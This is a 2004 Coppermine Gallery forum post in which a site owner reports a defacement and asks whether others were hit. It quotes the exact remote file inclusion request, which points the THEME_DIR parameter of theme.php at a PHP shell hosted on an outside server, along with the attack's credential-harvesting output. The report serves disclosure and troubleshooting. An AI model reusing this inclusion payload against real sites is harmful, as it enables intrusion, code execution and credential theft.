PostNuke Coppermine Gallery Security Error PostNuke Coppermine Gallery Security Error
 

News:

CPG Release 1.6.28
added submissions from {406man}
cleaned up a few PHP (8.4) deprecations
fixed PHP deprecation in calendar
removed security vulnerability
(please upgrade when possible)

Main Menu

PostNuke Coppermine Gallery Security Error

Started by PsyVision, October 12, 2004, 01:35:33 PM

Previous topic - Next topic

0 Members and 2 Guests are viewing this topic.

Print
Go Down Pages1
User actions

PsyVision

October 12, 2004, 01:35:33 PM Last Edit: October 13, 2004, 12:20:18 AM by GauGau
hey,

I run a website www.dustify.net. Last night someone has used coppermine to execute a php script to deface the front page of the website by accessing the postnuke username/password.

"http://www.dustify.net/modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.webfontes.com.br/priv8/cmd.gif?&nick=MaMa&op=coppermine"

is the request that was put through our webserver. The error is in "http://www.dustify.net/modules/coppermine/themes/default/theme.php" and the file "http://www.webfontes.com.br/priv8/cmd.gif" is not an image, it contains PHP code to break into several security flaws in several image galleries.

The result of executing the script is:

"Possível Login cPanel: **** Possível Senha: ****
Admins:
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in http://www.webfontes.com.br/priv8/cmd.gif?/user_list_info_box.inc on line 251

Site Ownado!"

Has anyone else had this problem?

Tranz

#1
October 12, 2004, 04:42:41 PM Last Edit: October 12, 2004, 04:48:36 PM by TranzNDance
Print
Go Up Pages1
User actions